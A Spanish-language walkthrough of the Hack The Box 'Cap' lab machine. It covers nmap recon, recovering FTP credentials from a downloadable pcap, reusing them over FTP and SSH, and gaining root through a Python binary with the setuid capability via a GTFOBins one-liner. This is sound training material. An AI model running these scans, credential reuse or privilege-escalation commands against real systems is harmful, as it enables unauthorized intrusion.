Cap

Reconocimiento

Empezamos la máquina haciendo un escaneo rápido en sus puertos con nmap:

nmap -sS --min-rate 5000 -vvv -n -Pn 10.10.10.245 -oG targeted

Habiendo encontrado los puertos 21, 22 y 80 dentro del rango de puertos abiertos, procedemos a desglosar las versiones de cada puerto:

nmap -p21,22,80 -sCV 10.10.10.245 -oN allPorts

Obteniendo como resultado de nmap lo siguiente:

Nmap scan report for 10.10.10.245
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-server-header: gunicorn
|_http-title: Sec

Tenemos varias alternativas: empezar por ftp si permite acceso anónimo, probar ssh con credenciales obtenidas, o inspeccionar http. De momento avanzaremos por la vía web para buscar indicios.

Web; Port 80

La web parece un gestor de consultas o peticiones en red, con apartados de monitoreo y una Snapshot de seguridad, además de las siguientes secciones.

IP (`ifconfig` o `ip a`)

Netstat

Pudieron parecer apartados vulnerables a inyecciones, pero los intentos no funcionaron.

Hay un apartado que recoge las peticiones y permite exportarlas a un archivo .pcap. Podemos recargar la página varias veces y obtendremos rutas numeradas n_recargas + 1, y existe un índice inicial 0. ¿Qué pasa si accedemos a /data/0?

Obtenemos peticiones; si descargamos su contenido y lo abrimos en una herramienta como Wireshark, podemos inspeccionar las peticiones realizadas por el usuario:

En las peticiones aparecen tanto un usuario como una posible contraseña. Ahora toca probar esa contraseña en ssh o ftp.

FTP

Guardamos las credenciales en un archivo (ejemplo rápido):

echo 'nathan:Buck3tH4TF0RM3!' > user_passwd

Probamos las credenciales en ftp:

Las credenciales son válidas y conseguimos la primera flag.

SSH

Probamos las mismas credenciales en ssh:

También obtenemos acceso por SSH. A partir de aquí, investigamos vías para la escalada de privilegios y obtener acceso como root.

Escalada de Privilegios

Revisamos varias técnicas para escalar privilegios.

Permisos `sudo`

Comprobamos permisos sudo del usuario:

sudo -l

No parece que sea por ahí.

Búsqueda SUID

Buscamos ficheros con bit SUID:

find / -type f -perm -4000 -ls 2>/dev/null

Aparecen muchos binarios por defecto del sistema, que por ahora descartamos.

Capabilities

Buscamos capacidades presentes en binarios:

# Búsqueda por capabilities
getcap -r / 2>/dev/null

Se observa que /usr/bin/python3.8 tiene capacidades que permiten explotarlo para escalar privilegios. Consultando GTFOBins (https://gtfobins.github.io/gtfobins/python/#capabilities), podemos emplear el siguiente comando:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Ejecutando ese comando conseguimos elevarnos a root y acceder a su directorio.

Previoushtb NextOutbound

Last updated 4 months ago

hashtagReconocimiento

hashtagWeb; Port 80

hashtagIP (ifconfig o ip a)

hashtagNetstat

hashtagFTP

hashtagSSH

hashtagEscalada de Privilegios

hashtagPermisos sudo

hashtagBúsqueda SUID

hashtagCapabilities